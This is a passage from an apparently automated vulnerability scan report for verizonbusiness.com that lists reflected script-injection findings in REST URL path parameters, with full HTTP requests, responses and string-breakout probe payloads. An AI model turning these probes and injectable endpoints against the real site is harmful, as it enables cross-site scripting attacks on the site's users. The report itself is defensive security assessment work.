Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:05 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40664
Date: Wed, 17 Nov 2010 00:37:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutionsac984';0aa0fbffa62/bysolutions/automation/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.921. http://www.verizonbusiness.com/solutions/bysolutions/automation/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/automation/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ab9f'%3b84c8265dc3b was submitted in the REST URL parameter 2. This input was echoed as 1ab9f';84c8265dc3b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions1ab9f'%3b84c8265dc3b/automation/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:37:44 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 41876
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions1ab9f';84c8265dc3b/automation/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.922. http://www.verizonbusiness.com/solutions/bysolutions/automation/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/automation/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a984"%3bea511c1c5b4 was submitted in the REST URL parameter 2. This input was echoed as 1a984";ea511c1c5b4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions1a984"%3bea511c1c5b4/automation/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:37:21 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 41876
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions1a984";ea511c1c5b4/automation/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.923. http://www.verizonbusiness.com/solutions/bysolutions/automation/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/automation/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a707"%3b6e880901f39 was submitted in the REST URL parameter 3. This input was echoed as 4a707";6e880901f39 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/automation4a707"%3b6e880901f39/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:01 GMT
Content-Type: text/html
Content-Length: 43100
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/automation4a707";6e880901f39/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.924. http://www.verizonbusiness.com/solutions/bysolutions/automation/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/automation/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8197'%3b0bfbadd0357 was submitted in the REST URL parameter 3. This input was echoed as f8197';0bfbadd0357 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/automationf8197'%3b0bfbadd0357/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:38:24 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43100
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/automationf8197';0bfbadd0357/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.925. http://www.verizonbusiness.com/solutions/bysolutions/cloud/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/cloud/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48ae4"%3b55d29e63734 was submitted in the REST URL parameter 1. This input was echoed as 48ae4";55d29e63734 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions48ae4"%3b55d29e63734/bysolutions/cloud/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:34:53 GMT
Content-Type: text/html
Content-Length: 40656
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:34:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:34:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions48ae4";55d29e63734/bysolutions/cloud/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEME
...[SNIP]...

1.926. http://www.verizonbusiness.com/solutions/bysolutions/cloud/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/cloud/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4200'%3bbf8b43f03ec was submitted in the REST URL parameter 1. This input was echoed as d4200';bf8b43f03ec in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsd4200'%3bbf8b43f03ec/bysolutions/cloud/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:29 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutionsd4200';bf8b43f03ec/bysolutions/cloud/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.927. http://www.verizonbusiness.com/solutions/bysolutions/cloud/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/cloud/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8ba6"%3b5b9a53619d2 was submitted in the REST URL parameter 2. This input was echoed as a8ba6";5b9a53619d2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsa8ba6"%3b5b9a53619d2/cloud/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:57 GMT
Content-Type: text/html
Content-Length: 41868
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutionsa8ba6";5b9a53619d2/cloud/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMI
...[SNIP]...

1.928. http://www.verizonbusiness.com/solutions/bysolutions/cloud/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/cloud/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7bc9'%3bb238e65321e was submitted in the REST URL parameter 2. This input was echoed as c7bc9';b238e65321e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsc7bc9'%3bb238e65321e/cloud/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:36:21 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 41866
Date: Wed, 17 Nov 2010 00:36:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutionsc7bc9';b238e65321e/cloud/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.929. http://www.verizonbusiness.com/solutions/bysolutions/cloud/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/cloud/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43a93"%3bedb1b3a8e99 was submitted in the REST URL parameter 3. This input was echoed as 43a93";edb1b3a8e99 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/cloud43a93"%3bedb1b3a8e99/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:36:49 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43090
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
{}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/cloud43a93";edb1b3a8e99/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.930. http://www.verizonbusiness.com/solutions/bysolutions/cloud/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/cloud/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8613'%3b3fbd2f7b347 was submitted in the REST URL parameter 3. This input was echoed as b8613';3fbd2f7b347 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/cloudb8613'%3b3fbd2f7b347/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:30 GMT
Content-Type: text/html
Content-Length: 43090
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/cloudb8613';3fbd2f7b347/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.931. http://www.verizonbusiness.com/solutions/bysolutions/contact-center/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/contact-center/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7573'%3be993577b079 was submitted in the REST URL parameter 1. This input was echoed as f7573';e993577b079 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsf7573'%3be993577b079/bysolutions/contact-center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:12 GMT
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutionsf7573';e993577b079/bysolutions/contact-center/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.932. http://www.verizonbusiness.com/solutions/bysolutions/contact-center/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/contact-center/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a936"%3b161636c6ba6 was submitted in the REST URL parameter 1. This input was echoed as 6a936";161636c6ba6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions6a936"%3b161636c6ba6/bysolutions/contact-center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:07 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40672
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions6a936";161636c6ba6/bysolutions/contact-center/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINI
...[SNIP]...

1.933. http://www.verizonbusiness.com/solutions/bysolutions/contact-center/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/contact-center/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45e9d'%3b1989311e036 was submitted in the REST URL parameter 2. This input was echoed as 45e9d';1989311e036 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

